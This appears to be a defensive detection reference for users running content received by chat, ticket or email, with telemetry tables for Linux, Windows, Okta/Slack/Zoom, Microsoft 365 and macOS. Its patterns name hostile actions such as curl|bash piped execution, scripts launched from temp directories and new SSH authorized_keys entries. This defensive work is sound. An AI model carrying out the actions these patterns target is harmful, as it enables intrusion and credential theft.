Detects users executing commands copied from chats, tickets, or emails, including curl|bash patterns, shell script launches from temp directories, credential changes, or SSH key additions shortly after communication events.
| Data Component | Name | Channel |
|---|---|---|
| Network Connection Creation (DC0082) | NSM:Connections | Outbound connection after script or installer launch |
| Command Execution (DC0064) | auditd:EXECVE | execve of curl,wget,bash,sh,python with piped or remote content |
| File Modification (DC0061) | auditd:PATH | odification of ~/.ssh/authorized_keys or credential files |
| Field | Description |
|---|---|
| RemoteScriptExecutionPatterns | Organization-specific admin automation patterns to exclude |
| TicketToExecutionWindow | Time from help desk/chat event to command execution |
Detects user execution of newly received content or instructions shortly after external communication, including script launches, Office child process spawning, browser-to-script execution chains, or credential prompts followed by new logon sessions.
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | WinEventLog:Sysmon | EventCode=1 |
| Network Connection Creation (DC0082) | WinEventLog:Sysmon | EventCode=3, 22 |
| Logon Session Creation (DC0067) | WinEventLog:Security | EventCode=4624, 4648 |
| File Creation (DC0039) | WinEventLog:Sysmon | EventCode=11 |
| Field | Description |
|---|---|
| EmailToExecutionWindow | Time between message delivery and process launch |
| OfficeChildProcessAllowlist | Approved Office child process patterns |
| NewLogonWindow | Time after credential prompt to monitor new sessions |
Detects consent grants, password resets, role changes, external sharing, or token creation shortly after user interaction with messages, invites, or help desk workflows. Emphasis is placed on unusual requester relationships, new device context, or off-hours approvals.
| Data Component | Name | Channel |
|---|---|---|
| User Account Authentication (DC0002) | saas:okta | user.account.reset_password; user.mfa.factor.activate; app.oauth2.authorize |
| Application Log Content (DC0038) | saas:slack | xternal DM or workspace invite preceding credential or approval actions |
| saas:zoom | Unexpected contact interaction preceding follow-on admin requests |
| Field | Description |
|---|---|
| RequesterNoveltyDays | How long since requestor last interacted with user |
| GeoVelocityThreshold | Distance/time anomaly for follow-on login |
| AfterHoursDefinition | Organization-specific off-hours period |
Detects suspicious inbound communications or collaboration requests followed by rapid sensitive user actions such as file sharing changes, macro enablement, OAuth consent, credential submission, or financial workflow approvals that deviate from historical relationships or normal approval patterns.
| Data Component | Name | Channel |
|---|---|---|
| Application Log Content (DC0038) | m365:unified | MailItemsAccessed; AddedInboxRule; ConsentToApplication; SharingSet |
| m365:exchange | External sender message followed by user action involving links or attachments | |
| m365:teams | External chat request or new tenant communication preceding approval activity |
| Field | Description |
|---|---|
| ActionAfterMessageWindow | Time window between inbound communication and sensitive action |
| TrustedDomainAllowlist | Known legitimate vendors or partner domains |
| ApprovalAmountThreshold | Monetary threshold for finance workflows |
Detects user-authorized execution of downloaded content or scripts after communication prompts, including browser downloads followed by osascript, shell, or installer execution and subsequent network activity.
| Data Component | Name | Channel |
|---|---|---|
| Command Execution (DC0064) | macos:unifiedlog | Execution of osascript, sh, bash, zsh, installer, open |
| Network Connection Creation (DC0082) | NSM:Connections | Outbound connection after script or installer launch |
| File Access (DC0055) | macos:unifiedlog | Recent download opened or executed |
| Field | Description |
|---|---|
| DownloadToExecutionWindow | Time between download and launch |
| InstallerParentAllowlist | Legitimate software deployment parents |